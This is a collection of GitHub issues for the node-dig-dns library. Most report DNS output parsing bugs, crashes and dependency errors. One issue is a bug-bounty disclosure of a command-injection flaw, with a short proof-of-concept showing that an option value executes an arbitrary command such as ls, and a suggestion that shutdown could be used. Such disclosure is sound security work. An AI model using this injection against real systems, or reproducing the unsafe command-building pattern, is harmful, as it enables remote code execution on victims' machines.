stephangeorg / node-dig-dns Goto Github PK

await dig(['+trace','ns1.com','@8.8.8.8'], { raw: false })
generates:

which is obviously wrong. i understand it is not easy to parse.. thanks

When performing an MX lookup with this module the value only contains the priority/preference rather than both DNS response and priority.

Please update line 24 within index.js to concat the response properly.

command: dig www.crowai.com. CAA
Result (cli):

...

;; ANSWER SECTION:
www.crowai.com.		299	IN	CNAME	www.unbouncepages.com.
www.unbouncepages.com.	3599	IN	CNAME	unbouncepages.com.
unbouncepages.com.	59	IN	CAA	0 issue "comodoca.com"
unbouncepages.com.	59	IN	CAA	0 issue "letsencrypt.org"
unbouncepages.com.	59	IN	CAA	0 issuewild "comodoca.com"

...

Note that CAA records return 3 values. I specifically require issue or issueWild in the results of dig(['www.crowai.com', 'CAA'])

The parse() function on index.js assumes whitespaces are the delimiter for splitting an output line. However, this fails for the TXT record because this type of record allows free text which could contains whitespaces.

e.g.

;; ANSWER SECTION:
sample.fqdn 900 IN TXT "hello world"

This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)

Vulnerability Description

I would like to report an RCE issue in the node-dig-dns module. It allows the execution of arbitrary commands remotely inside the victim's PC.

The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here: https://github.com/StephanGeorg/node-dig-dns/blob/master/src/index.js#L6

Steps To Reproduce:

1. Create the following PoC file:

// poc.js
var dig = require('node-dig-dns');

dig([],{'dig':'ls'})
  .then((result) => {
    console.log(result)
  })
  .catch((err) => {
    console.log('Error:', err);
  });

2. Execute the following commands in another terminal:

npm i node-dig-dns # Install affected module
node poc.js #  Run the PoC

3. The output will show you the result of the ls command {F605976}

Please, note the vulnerability occurs only with a mono command, making the commands to be executed more difficult and a little impactful. Anyway, Linux is a complex ecosystem, where commands like shutdown can be used in any way to make the PoC work and a bit better.

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

esult.time = Number(data[data.length - 6].replace(';; Query time: ', '').replace(' msec', '')); ^ TypeError: Cannot read property 'replace' of undefined

using a simple script

const dig = require('node-dig-dns');
dig(['google.com', 'ANY'])
  .then((result) => {
    console.log(result)
  })
  .catch((err) => {
    console.log('Error:', err);
  });

anyone have the same problem?

Hello, after upgrading to the latest package version, the package crashes when importing it. We get the following error

internal/modules/cjs/loader.js:896
  throw err;
  ^

Error: Cannot find module '@babel/runtime/helpers/interopRequireDefault'
Require stack:
- /home/marco/testdns/node_modules/node-dig-dns/dist/index.js
- /home/marco/testdns/test.js
    at Function.Module._resolveFilename (internal/modules/cjs/loader.js:893:15)
    at Function.Module._load (internal/modules/cjs/loader.js:743:27)
    at Module.require (internal/modules/cjs/loader.js:965:19)
    at require (internal/modules/cjs/helpers.js:88:18)
    at Object.<anonymous> (/home/marco/testdns/node_modules/node-dig-dns/dist/index.js:3:30)
    at Module._compile (internal/modules/cjs/loader.js:1076:30)
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:1097:10)
    at Module.load (internal/modules/cjs/loader.js:941:32)
    at Function.Module._load (internal/modules/cjs/loader.js:782:14)
    at Module.require (internal/modules/cjs/loader.js:965:19) {
  code: 'MODULE_NOT_FOUND',
  requireStack: [
    '/home/marco/testdns/node_modules/node-dig-dns/dist/index.js',
    '/home/marco/testdns/test.js'
  ]
}

As the title suggests =P

$ git push origin bugfix/spaces_in_values
remote: Permission to StephanGeorg/node-dig-dns.git denied to tantricllama.
fatal: unable to access 'https://github.com/StephanGeorg/node-dig-dns.git/': The requested URL returned error: 403

Is this a repo setting?